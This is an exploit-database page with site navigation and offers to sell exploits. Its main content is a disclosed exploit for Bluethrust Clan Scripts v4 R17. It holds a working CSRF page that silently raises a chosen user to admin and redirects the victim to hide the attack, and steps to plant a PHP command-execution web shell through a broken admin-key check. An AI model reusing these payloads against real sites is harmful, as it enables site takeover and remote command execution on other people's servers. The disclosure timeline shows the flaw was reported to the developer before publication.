0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities
[<!--
Exploit title: Bluethrust Clan Scripts v4 R17 CSRF & PHP Shell Upload (Admin)
Exploit: Brandon Murphy https://www.linkedin.com/in/brandonm86
Vendor Homepage: https://bluethrust.com
Tested on: Windows 7/Firefox
Exploit Description:
Stable with Firefox 44.0. Other browsers may be unstable or may not work. Only Bluethrust Clan Scripts v4 R17 was tested but other versions may be vulnerable!
CSRF
Note: The developer applied the patch to the webapp without changing the revision number which could cause confusion to customers.
---------------------
There is no token check when changing a current user rank thus allowing CSRF to take place. When the code below is executed by an authenticated admin it will grant the defined user Commander/Admin rights.
PHP Shell Upload
-----------------------
After CSRF has taken place you can login to your account like normal. Once logged in click "My Profile>Administrator options>Modify Current Theme" or use site.com/members/console.php?cID=61. You can then insert the PHP code of your choosing into Footer. In order to add or edit code you are required to provide a special Admin Key that was defined during install. The key isn't needed as the check is faulty and can be left blank. Just insert your code and click Edit Theme. It will say the key was incorrect, but the PHP code is still inserted.
e.g. <?php $cmd=$_REQUEST['cmd']; system($cmd); ?> put into the footer code. site.com/themes/destiny/_footer.php?cmd=dir for command execution.
Timeline:
2/6/2016 - Dev notified of vulnerabilities
2/6/2016 - Dev acknowledges vulnerabilities
2/7/2016 - Patch applied and made public
3/7/2016 - Public Disclosure
Disclaimer:
I cannot be held accountable for anything you do with this code.
You take responsibility for your own actions. For educational and testing purposes only.
-->
<html>
<form action="http://site.com/clan/members/console.php?cID=8" method="POST">
<input type="hidden" name="member" value="4"/> <!-- User ID to be granted Admin -->
<input type="hidden" name="newrank" value="41"/> <!-- 41 is Commander/Admin -->
<input type="hidden" name="reason" value=""/>
<input type="hidden" name="freezetime" value="0"/>
<input type="hidden" name="submit" value="Set+Rank"/>
</form>
<script>
document.createElement('form').submit.call(document.forms[0]);
window.location.href = "http://site.com/clan/members/"; <!-- Redirect admin after CSRF takes place to avoid pop-up notification -->
</script>
</html>
# 0day.today [2024-11-16] #